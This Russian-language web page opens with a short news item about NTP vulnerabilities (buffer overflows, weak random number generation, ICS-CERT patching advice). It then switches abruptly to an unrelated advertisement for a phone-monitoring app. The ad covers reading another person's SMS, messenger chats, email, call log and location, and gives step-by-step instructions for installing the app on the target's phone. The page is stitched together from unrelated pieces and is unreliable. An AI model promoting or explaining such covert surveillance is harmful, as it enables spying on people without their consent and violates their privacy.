Специалисты нашли в протоколе NTP серьёзные уязвимости

031 Сотрудники ICS-CERT обязаны быстро реагировать на любые киберугрозы в сфере промышленных программных систем. На этот раз их внимание привлекла серьёзная ошибка, выявленная в использовании протокола NTP. Версии 4.2.8 и ниже уязвимы к таким атакам, в более свежих прошивках проблема была успешно устранена. Также в изучении проблемы большую работу проделали специалисты из Google, проведшие глубокий анализ нескольких промышленных систем с протоколом NTP.

В официальном отчёте ICS-CERT сообщается о том, что уязвимость можно использовать благодаря возможности запуска произвольного кода в рамках ntpd-процессов. Поскольку требуемые эксплоиты доступны на многих сетевых ресурсах, воспользоваться ими может любой желающий. Для этого не требуется каких-то особых хакерских навыков, вполне достаточно среднего уровня знаний. Реальных фактов использования бреши выявлено не было.

Специалисты из Google Neel Mehta и Stephen Roettger заявляют, что три из найденных уязвимостей эксплуатируют переполнение буфера. Также большой проблемой является слабая случайная генерация чисел, принятая в NTP. Ещё одна уязвимость носит менее критический характер. В обновлении потребовалось усовершенствовать ключ для генерации по умолчанию, используя более совершенный и сложный для обнаружения алгоритм.

Что касается рекомендаций по обновлению систем, то сотрудники ICS-CERT предупреждают сетевых администраторов о необходимости протестировать патч на отдельной машине, а также свести взаимодействие с Сетью к минимуму. Рекомендуется использовать межсетевые экраны, предварительно сделав резервную копию всех данных, с которыми планируется работать. Это же касается и систем управления, используемых в крупных промышленных комплексах.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.